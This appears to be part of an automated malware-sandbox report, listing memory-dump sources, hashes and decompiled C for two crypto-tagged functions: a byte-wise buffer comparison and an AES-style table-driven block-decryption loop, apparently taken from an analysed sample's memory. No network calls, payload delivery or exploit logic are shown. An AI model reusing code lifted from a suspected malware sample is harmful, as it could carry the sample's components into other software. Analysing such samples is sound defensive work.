              0x00d8fd34
              0x00d8fd3d
              0x00000000
              0x00000000
              0x00000000
              0x00d8fd3d
              0x00d8fd13
              0x00d8fd16
              0x00d8fd1f
              0x00000000
              0x00000000
              0x00000000
              0x00d8fd1f
              0x00d8fcf5
              0x00d8fcf8
              0x00d8fd01
              0x00000000
              0x00000000
              0x00000000
              0x00d8fd01
              0x00d8fcd6
              0x00d8fcd6
              0x00d90ac7

              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
              • Instruction ID: f70a9f4f84e152550629e75c68d11eeddbfd51d282461a3478b1119dbb2879a6
              • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
              • Instruction Fuzzy Hash: 44C171722051970ADF2D673A857413EBAA16EA27B131E077DE8B2CB1D5FE20C664D730
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8F8C6, Relevance: .3, Instructions: 323COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D8F8C6(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}


































              0x00d8f8c6
              0x00d8f8c6
              0x00d8f8c6
              0x00d8f8cc
              0x00d8f953
              0x00d8f955
              0x00d8f957
              0x00d8fcd6
              0x00d8fcd6
              0x00d90ac7
              0x00d90ac7
              0x00d8f95d
              0x00d8f963
              0x00d8f9ea
              0x00d8f9ec
              0x00d8f9ee
              0x00000000
              0x00000000
              0x00d8f9f4
              0x00d8f9fa
              0x00d8fa81
              0x00d8fa83
              0x00d8fa85
              0x00000000
              0x00000000
              0x00d8fa8b
              0x00d8fa91
              0x00d8fb18
              0x00d8fb1a
              0x00d8fb1c
              0x00000000
              0x00000000
              0x00d8fb28
              0x00d8fbb0
              0x00d8fbb2
              0x00d8fbb4
              0x00000000
              0x00000000
              0x00d8fbba
              0x00d8fbc0
              0x00d8fc47
              0x00d8fc49
              0x00d8fc4b
              0x00000000
              0x00000000
              0x00d8fc51
              0x00d8fc57
              0x00d8fcce
              0x00d8fcd0
              0x00d8fcd2
              0x00d8fcd4
              0x00d8fcd4
              0x00000000
              0x00d8fcd2
              0x00d8fc60
              0x00d8fc62
              0x00d8fc76
              0x00d8fc7e
              0x00d8fc80
              0x00d8fc94
              0x00d8fc9c
              0x00d8fc9e
              0x00d8fcb2
              0x00d8fcba
              0x00d8fcbc
              0x00d8fcc5
              0x00d8fcc5
              0x00000000
              0x00d8fcbc
              0x00d8fca7
              0x00d8fcb0
              0x00000000
              0x00000000
              0x00000000
              0x00d8fcb0
              0x00d8fc89
              0x00d8fc92
              0x00000000
              0x00000000
              0x00000000
              0x00d8fc92
              0x00d8fc6b
              0x00d8fc74
              0x00000000
              0x00000000
              0x00000000
              0x00d8fc74
              0x00d8fbcd
              0x00d8fbcf
              0x00d8fbe7
              0x00d8fbef
              0x00d8fbf1
              0x00d8fc09
              0x00d8fc11
              0x00d8fc13
              0x00d8fc2b
              0x00d8fc33
              0x00d8fc35
              0x00d8fc3e
              0x00d8fc3e
              0x00000000
              0x00d8fc35
              0x00d8fc1c
              0x00d8fc25
              0x00000000
              0x00000000
              0x00000000
              0x00d8fc25
              0x00d8fbfa
              0x00d8fc03
              0x00000000
              0x00000000
              0x00000000
              0x00d8fc03
              0x00d8fbd8
              0x00d8fbe1
              0x00000000
              0x00000000
              0x00000000
              0x00d8fbe1
              0x00d8fb36
              0x00d8fb38
              0x00d8fb50
              0x00d8fb58
              0x00d8fb5a
              0x00d8fb72
              0x00d8fb7a
              0x00d8fb7c
              0x00d8fb94
              0x00d8fb9c
              0x00d8fb9e
              0x00d8fba7
              0x00d8fba7
              0x00000000
              0x00d8fb9e
              0x00d8fb85
              0x00d8fb8e
              0x00000000
              0x00000000
              0x00000000
              0x00d8fb8e
              0x00d8fb63
              0x00d8fb6c
              0x00000000
              0x00000000
              0x00000000
              0x00d8fb6c
              0x00d8fb41
              0x00d8fb4a
              0x00000000
              0x00000000
              0x00000000
              0x00d8fb4a
              0x00d8fa9e
              0x00d8faa0
              0x00d8fab8
              0x00d8fac0
              0x00d8fac2
              0x00d8fada
              0x00d8fae2
              0x00d8fae4
              0x00d8fafc
              0x00d8fb04
              0x00d8fb06
              0x00d8fb0f
              0x00d8fb0f
              0x00000000
              0x00d8fb06
              0x00d8faed
              0x00d8faf6
              0x00000000
              0x00000000
              0x00000000
              0x00d8faf6
              0x00d8facb
              0x00d8fad4
              0x00000000
              0x00000000
              0x00000000
              0x00d8fad4
              0x00d8faa9
              0x00d8fab2
              0x00000000
              0x00000000
              0x00000000
              0x00d8fab2
              0x00d8fa07
              0x00d8fa09
              0x00d8fa21
              0x00d8fa29
              0x00d8fa2b
              0x00d8fa43
              0x00d8fa4b
              0x00d8fa4d
              0x00d8fa65
              0x00d8fa6d
              0x00d8fa6f
              0x00d8fa78
              0x00d8fa78
              0x00000000
              0x00d8fa6f
              0x00d8fa56
              0x00d8fa5f
              0x00000000
              0x00000000
              0x00000000
              0x00d8fa5f
              0x00d8fa34
              0x00d8fa3d
              0x00000000
              0x00000000
              0x00000000
              0x00d8fa3d
              0x00d8fa12
              0x00d8fa1b
              0x00000000
              0x00000000
              0x00000000
              0x00d8fa1b
              0x00d8f970
              0x00d8f972
              0x00d8f98a
              0x00d8f992
              0x00d8f994
              0x00d8f9ac
              0x00d8f9b4
              0x00d8f9b6
              0x00d8f9ce
              0x00d8f9d6
              0x00d8f9d8
              0x00d8f9e1
              0x00d8f9e1
              0x00000000
              0x00d8f9d8
              0x00d8f9bf
              0x00d8f9c8
              0x00000000
              0x00000000
              0x00000000
              0x00d8f9c8
              0x00d8f99d
              0x00d8f9a6
              0x00000000
              0x00000000
              0x00000000
              0x00d8f9a6
              0x00d8f97b
              0x00d8f984
              0x00000000
              0x00000000
              0x00000000
              0x00d8f984
              0x00d8f8d9
              0x00d8f8db
              0x00d8f8f3
              0x00d8f8fb
              0x00d8f8fd
              0x00d8f915
              0x00d8f91d
              0x00d8f91f
              0x00d8f937
              0x00d8f93f
              0x00d8f941
              0x00d8f94a
              0x00d8f94a
              0x00000000
              0x00d8f941
              0x00d8f928
              0x00d8f931
              0x00000000
              0x00000000
              0x00000000
              0x00d8f931
              0x00d8f906
              0x00d8f90f
              0x00000000
              0x00000000
              0x00000000
              0x00d8f90f
              0x00d8f8e4
              0x00d8f8ed
              0x00000000
              0x00000000
              0x00000000

              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
              • Instruction ID: 36c1c8948dde2a2c2787ca716e148b75f149c5daccaa37cca9f40cb2cc537618
              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
              • Instruction Fuzzy Hash: 67C172722051970ADF2D673AC57413EBAA16AA27B131E077DE8B2CB1D4FE20D664D730
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7DF12, Relevance: .3, Instructions: 318COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D7DF12(void* __ebx, intOrPtr __ecx, void* __esi) {
				void* _t222;
				signed int _t229;
				signed char _t253;
				signed int _t301;
				signed int* _t304;
				signed int* _t309;
				unsigned int _t313;
				signed char _t348;
				unsigned int _t350;
				signed int _t353;
				unsigned int _t356;
				signed int* _t359;
				signed int _t363;
				signed int _t368;
				signed int _t372;
				signed int _t376;
				signed char _t378;
				signed int* _t382;
				signed int _t388;
				signed int _t394;
				signed int _t399;
				intOrPtr _t400;
				signed char _t402;
				signed char _t403;
				signed char _t404;
				unsigned int _t406;
				signed int _t409;
				signed int _t411;
				unsigned int _t412;
				unsigned int _t414;
				unsigned int _t415;
				signed int _t416;
				signed int _t421;
				void* _t422;
				unsigned int _t423;
				signed int _t426;
				intOrPtr _t429;
				signed int* _t430;
				void* _t431;
				void* _t432;

				_t414 =  *(_t431 + 0x64);
				_t429 = __ecx;
				 *((intOrPtr*)(_t431 + 0x1c)) = __ecx;
				if(_t414 != 0) {
					_t415 = _t414 >> 4;
					 *(_t431 + 0x64) = _t415;
					if( *((char*)(__ecx)) == 0) {
						 *((intOrPtr*)(_t431 + 0x30)) = __ecx + 8;
						E00D8EA80(_t431 + 0x54, __ecx + 8, 0x10);
						_t432 = _t431 + 0xc;
						if(_t415 == 0) {
							L13:
							return E00D8EA80( *((intOrPtr*)(_t432 + 0x30)), _t432 + 0x50, 0x10);
						}
						_t399 =  *(_t432 + 0x60);
						 *(_t432 + 0x1c) = _t399 + 8;
						_t229 =  *(_t432 + 0x70);
						_t400 = _t399 - _t229;
						 *((intOrPtr*)(_t432 + 0x2c)) = _t400;
						_t359 = _t229 + 8;
						 *(_t432 + 0x20) = _t359;
						do {
							_t421 =  *(_t429 + 4);
							 *(_t432 + 0x28) = _t359 + _t400 + 0xfffffff8;
							E00D7DEDF(_t432 + 0x4c, _t359 + _t400 + 0xfffffff8, (_t421 << 4) + 0x18 + _t429);
							_t402 =  *(_t432 + 0x44);
							 *(_t432 + 0x68) =  *(0xdb5350 + (_t402 & 0x000000ff) * 4) ^  *(0xdb5f50 + ( *(_t432 + 0x4b) & 0x000000ff) * 4) ^  *(0xdb5b50 + ( *(_t432 + 0x4e) & 0x000000ff) * 4);
							_t348 =  *(_t432 + 0x50);
							_t363 =  *(_t432 + 0x68) ^  *(0xdb5750 + (_t348 & 0x000000ff) * 4);
							 *(_t432 + 0x68) = _t363;
							 *(_t432 + 0x34) = _t363;
							_t403 =  *(_t432 + 0x48);
							_t368 =  *(0xdb5750 + (_t402 & 0x000000ff) * 4) ^  *(0xdb5350 + (_t403 & 0x000000ff) * 4) ^  *(0xdb5f50 + ( *(_t432 + 0x4f) & 0x000000ff) * 4) ^  *(0xdb5b50 + ( *(_t432 + 0x52) & 0x000000ff) * 4);
							 *(_t432 + 0x70) = _t368;
							 *(_t432 + 0x38) = _t368;
							_t404 =  *(_t432 + 0x4c);
							 *(_t432 + 0x10) =  *(0xdb5b50 + ( *(_t432 + 0x46) & 0x000000ff) * 4) ^  *(0xdb5750 + (_t403 & 0x000000ff) * 4);
							_t372 =  *(_t432 + 0x10) ^  *(0xdb5350 + (_t404 & 0x000000ff) * 4) ^  *(0xdb5f50 + ( *(_t432 + 0x53) & 0x000000ff) * 4);
							 *(_t432 + 0x10) = _t372;
							 *(_t432 + 0x3c) = _t372;
							 *(_t432 + 0x14) =  *(0xdb5f50 + ( *(_t432 + 0x47) & 0x000000ff) * 4) ^  *(0xdb5b50 + ( *(_t432 + 0x4a) & 0x000000ff) * 4);
							_t376 =  *(_t432 + 0x14) ^  *(0xdb5750 + (_t404 & 0x000000ff) * 4) ^  *(0xdb5350 + (_t348 & 0x000000ff) * 4);
							_t422 = _t421 - 1;
							 *(_t432 + 0x14) = _t376;
							 *(_t432 + 0x40) = _t376;
							if(_t422 <= 1) {
								goto L9;
							}
							_t416 =  *(_t432 + 0x68);
							_t309 = (_t422 + 2 << 4) + _t429;
							 *(_t432 + 0x14) = _t309;
							_t430 = _t309;
							 *((intOrPtr*)(_t432 + 0x18)) = _t422 - 1;
							do {
								_t411 =  *_t430;
								 *(_t432 + 0x68) =  *(_t430 - 8) ^ _t416;
								_t430 = _t430 - 0x10;
								_t313 = _t430[5] ^ _t376;
								_t412 = _t411 ^  *(_t432 + 0x10);
								 *(_t432 + 0x14) = _t313;
								_t356 = _t430[3] ^  *(_t432 + 0x70);
								_t416 =  *(0xdb5750 + (_t313 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xdb5b50 + (_t412 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xdb5f50 + (_t356 >> 0x18) * 4) ^  *(0xdb5350 + ( *(_t432 + 0x68) & 0x000000ff) * 4);
								 *(_t432 + 0x34) = _t416;
								 *(_t432 + 0x70) =  *(0xdb5b50 + ( *(_t432 + 0x14) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xdb5f50 + (_t412 >> 0x18) * 4);
								_t388 =  *(_t432 + 0x70) ^  *(0xdb5750 + ( *(_t432 + 0x68) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xdb5350 + (_t356 & 0x000000ff) * 4);
								 *(_t432 + 0x70) = _t388;
								 *(_t432 + 0x38) = _t388;
								_t394 =  *(0xdb5f50 + ( *(_t432 + 0x14) >> 0x18) * 4) ^  *(0xdb5750 + (_t356 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xdb5b50 + ( *(_t432 + 0x68) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xdb5350 + (_t412 & 0x000000ff) * 4);
								 *(_t432 + 0x10) = _t394;
								 *(_t432 + 0x3c) = _t394;
								_t376 =  *(0xdb5750 + (_t412 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xdb5b50 + (_t356 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xdb5f50 + ( *(_t432 + 0x68) >> 0x18) * 4) ^  *(0xdb5350 + ( *(_t432 + 0x14) & 0x000000ff) * 4);
								_t135 = _t432 + 0x18;
								 *_t135 =  *((intOrPtr*)(_t432 + 0x18)) - 1;
								 *(_t432 + 0x40) = _t376;
							} while ( *_t135 != 0);
							_t429 =  *((intOrPtr*)(_t432 + 0x24));
							 *(_t432 + 0x68) = _t416;
							_t415 =  *(_t432 + 0x6c);
							 *(_t432 + 0x14) = _t376;
							L9:
							_t253 =  *(_t429 + 0x28) ^  *(_t432 + 0x68);
							 *(_t432 + 0x6c) = _t253;
							 *(_t432 + 0x44) = _t253;
							_t378 =  *(_t429 + 0x34) ^  *(_t432 + 0x14);
							 *(_t432 + 0x34) =  *((intOrPtr*)((_t253 & 0x000000ff) + 0xdb4230));
							_t406 =  *(_t429 + 0x30) ^  *(_t432 + 0x10);
							_t350 =  *(_t429 + 0x2c) ^  *(_t432 + 0x70);
							 *((char*)(_t432 + 0x35)) =  *((intOrPtr*)((_t378 >> 0x00000008 & 0x000000ff) + 0xdb4230));
							_t423 =  *(_t432 + 0x6c);
							 *(_t432 + 0x4c) = _t406;
							 *(_t432 + 0x48) = _t350;
							 *((char*)(_t432 + 0x36)) =  *((intOrPtr*)((_t406 >> 0x00000010 & 0x000000ff) + 0xdb4230));
							 *(_t432 + 0x50) = _t378;
							 *((char*)(_t432 + 0x37)) =  *((intOrPtr*)((_t350 >> 0x18) + 0xdb4230));
							 *(_t432 + 0x38) =  *((intOrPtr*)((_t350 & 0x000000ff) + 0xdb4230));
							 *((char*)(_t432 + 0x39)) =  *((intOrPtr*)((_t423 >> 0x00000008 & 0x000000ff) + 0xdb4230));
							 *((char*)(_t432 + 0x3a)) =  *((intOrPtr*)((_t378 >> 0x00000010 & 0x000000ff) + 0xdb4230));
							_t170 = (_t406 >> 0x18) + 0xdb4230; // 0x54cbe9de
							 *((char*)(_t432 + 0x3b)) =  *_t170;
							 *(_t432 + 0x3c) =  *((intOrPtr*)((_t406 & 0x000000ff) + 0xdb4230));
							 *((char*)(_t432 + 0x3d)) =  *((intOrPtr*)((_t350 >> 0x00000008 & 0x000000ff) + 0xdb4230));
							 *((char*)(_t432 + 0x3e)) =  *((intOrPtr*)((_t423 >> 0x00000010 & 0x000000ff) + 0xdb4230));
							 *((char*)(_t432 + 0x3f)) =  *((intOrPtr*)((_t378 >> 0x18) + 0xdb4230));
							 *(_t432 + 0x40) =  *((intOrPtr*)((_t378 & 0x000000ff) + 0xdb4230));
							_t409 =  *(_t432 + 0x34) ^  *(_t429 + 0x18);
							 *((char*)(_t432 + 0x41)) =  *((intOrPtr*)((_t406 >> 0x00000008 & 0x000000ff) + 0xdb4230));
							 *((char*)(_t432 + 0x42)) =  *((intOrPtr*)((_t350 >> 0x00000010 & 0x000000ff) + 0xdb4230));
							 *((char*)(_t432 + 0x43)) =  *((intOrPtr*)((_t423 >> 0x18) + 0xdb4230));
							_t301 =  *(_t432 + 0x40) ^  *(_t429 + 0x24);
							_t426 =  *(_t432 + 0x38) ^  *(_t429 + 0x1c);
							_t353 =  *(_t432 + 0x3c) ^  *(_t429 + 0x20);
							 *(_t432 + 0x6c) = _t301;
							if( *((char*)(_t429 + 1)) != 0) {
								_t409 = _t409 ^  *(_t432 + 0x54);
								_t426 = _t426 ^  *(_t432 + 0x58);
								_t353 = _t353 ^  *(_t432 + 0x5c);
								 *(_t432 + 0x6c) = _t301 ^  *(_t432 + 0x60);
							}
							 *(_t432 + 0x54) =  *( *(_t432 + 0x28));
							_t304 =  *(_t432 + 0x1c);
							 *(_t432 + 0x58) =  *(_t304 - 4);
							 *(_t432 + 0x5c) =  *_t304;
							 *(_t432 + 0x60) = _t304[1];
							_t382 =  *(_t432 + 0x20);
							 *(_t432 + 0x1c) =  &(_t304[4]);
							 *(_t382 - 8) = _t409;
							_t382[1] =  *(_t432 + 0x6c);
							_t400 =  *((intOrPtr*)(_t432 + 0x2c));
							 *(_t382 - 4) = _t426;
							 *_t382 = _t353;
							_t359 =  &(_t382[4]);
							_t415 = _t415 - 1;
							 *(_t432 + 0x20) = _t359;
							 *(_t432 + 0x6c) = _t415;
						} while (_t415 != 0);
						goto L13;
					}
					return E00D7E3D4(__ecx,  *((intOrPtr*)(_t431 + 0x68)), _t415,  *((intOrPtr*)(_t431 + 0x68)));
				}
				return _t222;
			}











































              0x00d7df17
              0x00d7df1b
              0x00d7df1d
              0x00d7df23
              0x00d7df29
              0x00d7df30
              0x00d7df34
              0x00d7df4f
              0x00d7df58
              0x00d7df5d
              0x00d7df62
              0x00d7e3b9
              0x00000000
              0x00d7e3c9
              0x00d7df68
              0x00d7df71
              0x00d7df75
              0x00d7df79
              0x00d7df7b
              0x00d7df7f
              0x00d7df82
              0x00d7df86
              0x00d7df86
              0x00d7df96
              0x00d7dfa3
              0x00d7dfa8
              0x00d7dfce
              0x00d7dfd2
              0x00d7dfdd
              0x00d7dfe4
              0x00d7dfe8
              0x00d7dfef
              0x00d7e015
              0x00d7e021
              0x00d7e025
              0x00d7e033
              0x00d7e03e
              0x00d7e055
              0x00d7e061
              0x00d7e065
              0x00d7e07c
              0x00d7e091
              0x00d7e098
              0x00d7e099
              0x00d7e09d
              0x00d7e0a4
              0x00000000
              0x00000000
              0x00d7e0aa
              0x00d7e0b4
              0x00d7e0b7
              0x00d7e0bb
              0x00d7e0bd
              0x00d7e0c1
              0x00d7e0c6
              0x00d7e0c9
              0x00d7e0cd
              0x00d7e0d3
              0x00d7e0d5
              0x00d7e0d9
              0x00d7e0e8
              0x00d7e118
              0x00d7e129
              0x00d7e13b
              0x00d7e157
              0x00d7e160
              0x00d7e164
              0x00d7e19d
              0x00d7e1a4
              0x00d7e1a8
              0x00d7e1d5
              0x00d7e1dc
              0x00d7e1dc
              0x00d7e1e1
              0x00d7e1e1
              0x00d7e1eb
              0x00d7e1ef
              0x00d7e1f3
              0x00d7e1f7
              0x00d7e1fb
              0x00d7e1fe
              0x00d7e202
              0x00d7e206
              0x00d7e210
              0x00d7e21d
              0x00d7e229
              0x00d7e230
              0x00d7e23a
              0x00d7e246
              0x00d7e24a
              0x00d7e24e
              0x00d7e258
              0x00d7e261
              0x00d7e26b
              0x00d7e278
              0x00d7e28a
              0x00d7e29c
              0x00d7e2a5
              0x00d7e2ab
              0x00d7e2bb
              0x00d7e2d0
              0x00d7e2e5
              0x00d7e2f4
              0x00d7e301
              0x00d7e30c
              0x00d7e315
              0x00d7e322
              0x00d7e32c
              0x00d7e33c
              0x00d7e33f
              0x00d7e342
              0x00d7e349
              0x00d7e34d
              0x00d7e34f
              0x00d7e353
              0x00d7e357
              0x00d7e35f
              0x00d7e35f
              0x00d7e369
              0x00d7e36d
              0x00d7e374
              0x00d7e37a
